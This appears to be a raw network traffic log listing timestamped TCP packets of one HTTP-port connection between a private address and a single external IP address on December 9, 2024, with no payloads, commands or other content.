Dec 9, 2024 08:08:18.214543104 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.214550018 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.214555979 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.214592934 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.215440989 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.215485096 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.215519905 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.215532064 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.215564013 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.215574980 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.216495991 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.216536999 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.216540098 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.216547966 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.216584921 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.217396021 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.217447042 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.217447996 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.217461109 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.217504025 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.218221903 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.218266964 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.218307972 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.218318939 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.218353987 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.219192982 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.219211102 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.219221115 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.219243050 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.219255924 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.220170975 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.220192909 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.220213890 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.220231056 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.366858959 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.366895914 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.366909027 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.366992950 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.367127895 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.367146015 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.367156982 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.367180109 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.367208958 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.368024111 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.368086100 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.368097067 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.368124008 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.368175983 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.369002104 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.369057894 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.369060040 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.369070053 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.369096994 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.369118929 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.369967937 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.370021105 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.370085001 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.370127916 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.383959055 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.384007931 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.384115934 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.384174109 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.384282112 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.384294033 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.384342909 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.384363890 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.385080099 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.385129929 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.385139942 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.385140896 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.385168076 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.385183096 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.385821104 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.385948896 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.385960102 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.386002064 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.386043072 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.386785984 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.386871099 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.386883020 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.386938095 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.387748957 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.387778044 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.387789011 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.387834072 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.388675928 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.388735056 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.388746977 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.388794899 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.389586926 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.389631987 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.389643908 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.389648914 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.389672995 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.389700890 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.390528917 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.390587091 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.390598059 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.390652895 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.391470909 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.391513109 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.391525030 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.391570091 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.392395020 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.392438889 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.392452002 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.392501116 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.393327951 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.393397093 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.393409014 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.393460989 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.394277096 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.394371986 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.394383907 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.394431114 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.395258904 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.395405054 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.395416975 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.395456076 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.396176100 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.396209002 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.396225929 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.396228075 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.396258116 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.396281004 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.397120953 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.397140026 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.397152901 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.397191048 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.397219896 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.398027897 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.398072958 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.398086071 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.398111105 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.398142099 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.399221897 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.399234056 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.399245977 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.399275064 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.399288893 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.399885893 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.399930954 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.399946928 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.399959087 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.399995089 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.400849104 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.400896072 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.400913954 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.400927067 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.400958061 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.401942015 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.401988983 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.401990891 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.402008057 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.402055979 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.402730942 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.402779102 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.402848005 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.402859926 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.402889013 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.402941942 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.403788090 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.403805971 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.403817892 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.403831005 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.403841019 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.403892040 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.404623032 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.404680967 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.404716969 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.404728889 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.404762983 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.405550003 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.405595064 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.405881882 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.405931950 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.406018019 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.406028986 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.406060934 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.406071901 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.406909943 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.406961918 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.406980991 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.406992912 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.407025099 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.407991886 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.408118010 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.408130884 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.408174038 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.408226013 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.408643961 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.408690929 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.408701897 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.408732891 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.408759117 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.409588099 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.409653902 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.409671068 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.409706116 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.409718990 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.410550117 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.410602093 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.410605907 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.410619974 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.410672903 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.410672903 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.411458969 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.411509037 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.411524057 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.411536932 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.411566973 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.412414074 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.412431955 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.412481070 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.412481070 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.559163094 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.559365034 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.559376955 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.559438944 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.559508085 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.559628010 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.559684992 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.559720993 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.559772968 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.560535908 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.560626984 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.560674906 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.561052084 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.561116934 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.561129093 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.561166048 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.561980963 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.562028885 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.562038898 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.562050104 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.562094927 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.579808950 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.579904079 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.579915047 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.579966068 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.580212116 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.580267906 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.580284119 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.580313921 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.580328941 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.581157923 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.581204891 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.581232071 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.581243992 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.581278086 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.581286907 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.582175016 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.582232952 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.582243919 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.582283974 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.582312107 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.583003044 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.583082914 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.583093882 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.583132982 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.583924055 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.583959103 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.583969116 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.583972931 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.583998919 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.584009886 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.584980011 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.585036039 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.585047007 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.585083008 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.585103035 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.585823059 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.585897923 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.585908890 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.585946083 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.586755037 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.586816072 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.586827040 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.586868048 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.587704897 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.587768078 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.587778091 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.587815046 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.588633060 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.588702917 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.588715076 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.588753939 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.589571953 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.589601040 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.589612007 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.589624882 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.589648962 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.591408968 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.591420889 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.591432095 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.591443062 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.591463089 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.591475010 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.591490030 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.591501951 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.591542959 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.592449903 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.592494965 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.592540979 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.592552900 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.592593908 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.593355894 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.593393087 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.593404055 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.593441963 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.594264030 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.594319105 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.594330072 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.594361067 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.594374895 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.595189095 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.595251083 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.595261097 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.595297098 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.598762035 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.598773956 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.598784924 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.598797083 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.598809004 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.598814964 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.598819971 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.598830938 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.598834038 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.598843098 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.598846912 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.598859072 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.598875046 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.598900080 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.599545956 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.599558115 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.599569082 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.599595070 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.599620104 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:18.600186110 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:18.600198984 CET	80	49783	185.215.113.16	192.168.2.4
